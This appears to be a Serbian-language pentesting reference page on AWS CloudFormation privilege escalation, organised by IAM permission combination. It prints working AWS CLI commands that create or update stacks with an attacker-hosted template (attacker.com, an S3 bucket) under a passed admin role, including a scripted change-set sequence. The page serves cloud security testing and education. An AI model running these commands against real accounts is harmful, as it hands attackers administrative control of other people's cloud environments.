AWS - Cloudformation Privesc

cloudformation

Za više informacija o cloudformation, proverite:

iam:PassRole, cloudformation:CreateStack

Napadač sa ovim dozvolama može eskalirati privilegije kreiranjem CloudFormation stack-a sa prilagođenim šablonom, hostovanim na njihovom serveru, da izvrši akcije pod dozvolama određenog rola:

aws cloudformation create-stack --stack-name <stack-name> \
--template-url http://attacker.com/attackers.template \
--role-arn <arn-role>

Na sledećoj stranici imate primer eksploatacije sa dodatnom dozvolom cloudformation:DescribeStacks:

Potencijalni uticaj: Privesc na servisnu ulogu cloudformation-a koja je navedena.

iam:PassRole, (cloudformation:UpdateStack | cloudformation:SetStackPolicy)

U ovom slučaju možete zloupotrebiti postojeći cloudformation stack da ga ažurirate i eskalirate privilegije kao u prethodnom scenariju:

aws cloudformation update-stack \
--stack-name privesc \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
--role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \
--capabilities CAPABILITY_IAM \
--region eu-west-1

The cloudformation:SetStackPolicy dozvola se može koristiti da dajte sebi UpdateStack dozvolu nad stogom i izvršite napad.

Potencijalni uticaj: Privesc na cloudformation servisnu ulogu koja je navedena.

cloudformation:UpdateStack | cloudformation:SetStackPolicy

Ako imate ovu dozvolu, ali nemate iam:PassRole, i dalje možete ažurirati stogove koji se koriste i zloupotrebiti IAM uloge koje su već povezane. Proverite prethodni odeljak za primer eksploatacije (samo nemojte navoditi nijednu ulogu u ažuriranju).

Dozvola cloudformation:SetStackPolicy se može koristiti da dajte sebi UpdateStack dozvolu nad stogom i izvršite napad.

Potencijalni uticaj: Privesc na cloudformation servisnu ulogu koja je već povezana.

iam:PassRole,((cloudformation:CreateChangeSet, cloudformation:ExecuteChangeSet) | cloudformation:SetStackPolicy)

Napadač sa dozvolama da prođe ulogu i kreira & izvrši ChangeSet može kreirati/ažurirati novi cloudformation stog i zloupotrebiti cloudformation servisne uloge baš kao sa CreateStack ili UpdateStack.

Sledeća eksploatacija je varijacija CreateStack one koristeći ChangeSet dozvole za kreiranje stoga.

aws cloudformation create-change-set \
--stack-name privesc \
--change-set-name privesc \
--change-set-type CREATE \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
--role arn:aws:iam::947247140022:role/CloudFormationAdmin \
--capabilities CAPABILITY_IAM \
--region eu-west-1

echo "Waiting 2 mins to change the stack"
sleep 120

aws cloudformation execute-change-set \
--change-set-name privesc \
--stack-name privesc \
--region eu-west-1

echo "Waiting 2 mins to execute the stack"
sleep 120

aws cloudformation describe-stacks \
--stack-name privesc \
--region eu-west-1

Dozvola cloudformation:SetStackPolicy može se koristiti za dodeljivanje sebi ChangeSet dozvola nad stekom i izvršavanje napada.

Potencijalni uticaj: Privesc na cloudformation servisne uloge.

(cloudformation:CreateChangeSet, cloudformation:ExecuteChangeSet) | cloudformation:SetStackPolicy)

Ovo je kao prethodna metoda bez prosleđivanja IAM uloga, tako da možete samo zloupotrebiti već pridružene, samo izmenite parametar:

--change-set-type UPDATE

Potencijalni Uticaj: Privesc na cloudformation servisnu ulogu koja je već povezana.

iam:PassRole,(cloudformation:CreateStackSet | cloudformation:UpdateStackSet)

Napadač bi mogao zloupotrebiti ove dozvole da kreira/aktualizuje StackSets kako bi zloupotrebio proizvoljne cloudformation uloge.

Potencijalni Uticaj: Privesc na cloudformation servisne uloge.

cloudformation:UpdateStackSet

Napadač bi mogao zloupotrebiti ovu dozvolu bez passRole dozvole da ažurira StackSets kako bi zloupotrebio povezane cloudformation uloge.

Potencijalni Uticaj: Privesc na povezane cloudformation uloge.

Reference

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/